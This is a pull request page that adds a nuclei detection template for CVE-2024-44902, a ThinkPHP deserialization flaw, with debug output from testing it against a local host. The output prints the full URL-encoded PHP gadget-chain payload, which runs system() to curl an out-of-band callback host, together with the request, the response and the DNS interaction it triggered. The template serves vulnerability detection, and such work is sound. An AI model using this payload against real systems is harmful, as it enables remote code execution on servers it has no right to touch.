PR
Added CVE-2024-44902 OOB Template
projectdiscovery/nuclei-templates#14321

/claim #14310

PR Information

[!IMPORTANT] Vulnerable instance details shared via email.

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details (leave it blank if not applicable)

Debug



                     __     _

   ____  __  _______/ /__  (_)

  / __ \/ / / / ___/ / _ \/ /

 / / / / /_/ / /__/ /  __/ /

/_/ /_/\__,_/\___/_/\___/_/   v3.6.0



                projectdiscovery.io



[INF] Current nuclei version: v3.6.0 (latest)

[INF] Current nuclei-templates version: v10.3.5 (latest)

[WRN] Scan results upload to cloud is disabled.

[INF] New templates added in latest release: 57

[INF] Templates loaded for current scan: 1

[WRN] Loading 1 unsigned templates for scan. Use with caution.

[INF] Targets loaded for current scan: 1

[INF] Using Interactsh Server: oast.fun

[INF] [CVE-2024-44902] Dumped HTTP request for http://127.0.0.1:1337/?data=O%3A28%3A%22think%5Croute%5CResourceRegister%22%3A2%3A%7Bs%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00resource%22%3BO%3A15%3A%22think%5CDbManager%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00instance%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A11%3A%22connections%22%3Ba%3A1%3A%7Bs%3A7%3A%22getRule%22%3Ba%3A2%3A%7Bs%3A4%3A%22type%22%3Bs%3A29%3A%22%5Cthink%5Ccache%5Cdriver%5CMemcached%22%3Bs%3A8%3A%22username%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A54%3A%22curl%20http%3A%2F%2Fd4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22fru1ts%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D%7D%7Ds%3A7%3A%22default%22%3Bs%3A7%3A%22getRule%22%3B%7D%7D%7D



GET /?data=O%3A28%3A%22think%5Croute%5CResourceRegister%22%3A2%3A%7Bs%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00resource%22%3BO%3A15%3A%22think%5CDbManager%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00instance%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A11%3A%22connections%22%3Ba%3A1%3A%7Bs%3A7%3A%22getRule%22%3Ba%3A2%3A%7Bs%3A4%3A%22type%22%3Bs%3A29%3A%22%5Cthink%5Ccache%5Cdriver%5CMemcached%22%3Bs%3A8%3A%22username%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A54%3A%22curl%20http%3A%2F%2Fd4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22fru1ts%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D%7D%7Ds%3A7%3A%22default%22%3Bs%3A7%3A%22getRule%22%3B%7D%7D%7D HTTP/1.1

Host: 127.0.0.1:1337

User-Agent: nuclei

Accept: */*

Connection: close

Accept-Encoding: gzip



[DBG] [CVE-2024-44902] Dumped HTTP response http://127.0.0.1:1337/?data=O%3A28%3A%22think%5Croute%5CResourceRegister%22%3A2%3A%7Bs%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00resource%22%3BO%3A15%3A%22think%5CDbManager%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00instance%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A11%3A%22connections%22%3Ba%3A1%3A%7Bs%3A7%3A%22getRule%22%3Ba%3A2%3A%7Bs%3A4%3A%22type%22%3Bs%3A29%3A%22%5Cthink%5Ccache%5Cdriver%5CMemcached%22%3Bs%3A8%3A%22username%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A54%3A%22curl%20http%3A%2F%2Fd4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22fru1ts%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D%7D%7Ds%3A7%3A%22default%22%3Bs%3A7%3A%22getRule%22%3B%7D%7D%7D



HTTP/1.1 200 OK

Connection: close

Transfer-Encoding: chunked

Content-Type: text/plain;charset=UTF-8

Date: Wed, 10 Dec 2025 07:48:43 GMT

Server: Apache/2.4.38 (Debian)

Vary: Accept-Encoding

X-Powered-By: PHP/8.0.7



Deserialized successfully

<html><head></head><body>gomwj5q54tth60j8teb9eql6bdmmbis4d</body></html><br />

<b>Fatal error</b>:  Uncaught Error: Cannot use a scalar value as an array in /var/www/html/vendor/topthink/think-orm/src/model/concern/Attribute.php:622

Stack trace:

#0 /var/www/html/vendor/topthink/think-orm/src/model/concern/Attribute.php(577): think\Model-&gt;getJsonValue('fru1ts', 0)

#1 /var/www/html/vendor/topthink/think-orm/src/model/concern/Attribute.php(547): think\Model-&gt;getValue('fru1ts', Array, false)

#2 /var/www/html/vendor/topthink/think-orm/src/model/concern/Conversion.php(262): think\Model-&gt;getAttr('fru1ts')

#3 /var/www/html/vendor/topthink/think-orm/src/model/concern/Conversion.php(369): think\Model-&gt;toArray()

#4 /var/www/html/vendor/topthink/think-orm/src/model/concern/Conversion.php(374): think\Model-&gt;toJson()

#5 /var/www/html/vendor/topthink/framework/src/think/cache/driver/Memcached.php(82): think\Model-&gt;__toString()

#6 /var/www/html/vendor/topthink/think-orm/src/DbManager.php(284): think\cache\driver\Memcached-&gt;__construct(Array)

#7 /var/www/html/vendor/topthink/think-orm/src/DbManager.php(241): think\DbManager-&gt;createConnection('getRule')

#8 /var/www/html/vendor/topthink/think-orm/src/DbManager.php(223): think\DbManager-&gt;instance('getRule', false)

#9 /var/www/html/vendor/topthink/think-orm/src/DbManager.php(399): think\DbManager-&gt;connect()

#10 /var/www/html/vendor/topthink/framework/src/think/route/ResourceRegister.php(51): think\DbManager-&gt;__call('getRule', Array)

#11 /var/www/html/vendor/topthink/framework/src/think/route/ResourceRegister.php(69): think\route\ResourceRegister-&gt;register()

#12 [internal function]: think\route\ResourceRegister-&gt;__destruct()

#13 {main}

  thrown in <b>/var/www/html/vendor/topthink/think-orm/src/model/concern/Attribute.php</b> on line <b>622</b><br />

[d4sibmmdb6lqe9bet8j06htt45q5jwmog] Received DNS interaction from 51.254.73.71 at 2025-12-10 07:48:43

------------

DNS Request

------------



;; opcode: QUERY, status: NOERROR, id: 52428

;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1



;; OPT PSEUDOSECTION:

; EDNS: version 0; flags: do; udp: 1232

; SUBNET: redacted/24/0



;; QUESTION SECTION:

;d4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun.    IN       A







------------

DNS Response

------------



;; opcode: QUERY, status: NOERROR, id: 52428

;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2



;; QUESTION SECTION:

;d4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun.    IN       A



;; ANSWER SECTION:

d4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun.     3600    IN      A       206.189.156.69



;; AUTHORITY SECTION:

d4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun.     3600    IN      NS      ns1.oast.fun.

d4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun.     3600    IN      NS      ns2.oast.fun.



;; ADDITIONAL SECTION:

ns1.oast.fun.   3600    IN      A       206.189.156.69

ns2.oast.fun.   3600    IN      A       206.189.156.69





[CVE-2024-44902:interactsh] [http] [critical] http://127.0.0.1:1337/?data=O%3A28%3A%22think%5Croute%5CResourceRegister%22%3A2%3A%7Bs%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00resource%22%3BO%3A15%3A%22think%5CDbManager%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00instance%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A2%3A%7Bs%3A11%3A%22connections%22%3Ba%3A1%3A%7Bs%3A7%3A%22getRule%22%3Ba%3A2%3A%7Bs%3A4%3A%22type%22%3Bs%3A29%3A%22%5Cthink%5Ccache%5Cdriver%5CMemcached%22%3Bs%3A8%3A%22username%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A54%3A%22curl%20http%3A%2F%2Fd4sibmmdb6lqe9bet8j06htt45q5jwmog.oast.fun%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22fru1ts%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22fru1ts%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D%7D%7Ds%3A7%3A%22default%22%3Bs%3A7%3A%22getRule%22%3B%7D%7D%7D

[INF] Scan completed in 8.147633921s. 1 matches found.
image

Additional References:

Claim

Total prize pool $100
Total paid $0
Status Pending
Submitted December 10, 2025
Last updated December 10, 2025

Contributors

0X

0xanis

@0xanis

 100%

Sponsors

PR

ProjectDiscovery

@projectdiscovery

$100